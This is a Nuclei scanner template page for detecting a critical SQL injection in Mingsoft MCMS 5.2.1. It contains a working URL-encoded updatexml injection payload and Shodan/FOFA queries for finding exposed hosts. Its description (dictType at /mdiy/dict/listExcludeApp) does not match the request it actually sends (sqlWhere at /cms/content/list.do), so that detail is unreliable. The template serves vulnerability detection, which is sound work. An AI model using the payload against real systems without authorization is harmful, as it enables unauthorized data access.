Skip to content

Mingsoft MCMS 5.2.1 - SQL Injection

ID: mcms-list-sqli

Severity: critical

Author: ritikchaddha

Tags: mingsoft,mcms,sqli

SQL injection vulnerability in Mingsoft MCMS 5.2.1 via the dictType parameter in /mdiy/dict/listExcludeApp.

id: mcms-list-sqli
info:
name: Mingsoft MCMS 5.2.1 - SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL injection vulnerability in Mingsoft MCMS 5.2.1 via the dictType parameter in /mdiy/dict/listExcludeApp.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
We recommend that you update to the latest version 5.4 or above.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I8MAJK
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89,CWE-707
epss-score: 0.00263
epss-percentile: 0.6564
cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: mingsoft
product: mcms
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: mingsoft,mcms,sqli
variables:
num: "999999999"
http:
- raw:
- |
POST /cms/content/list.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2cmd5({{num}})%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22%C3%A6%C2%96%C2%87%C3%A7%C2%AB%20%C3%A6%20%C2%87%C3%A9%C2%A2%C2%98%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25"
# digest: 4a0a004730450221009456cbfacd86b0e98e16e5941ce88890b28f21f6cfb605b851799b03f470208c02207013775cc73eb5765efc5856692029647ecef22db7fad9fa6803de86a6d0287b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/mingsoft/mcms-list-sqli.yaml"

View on Github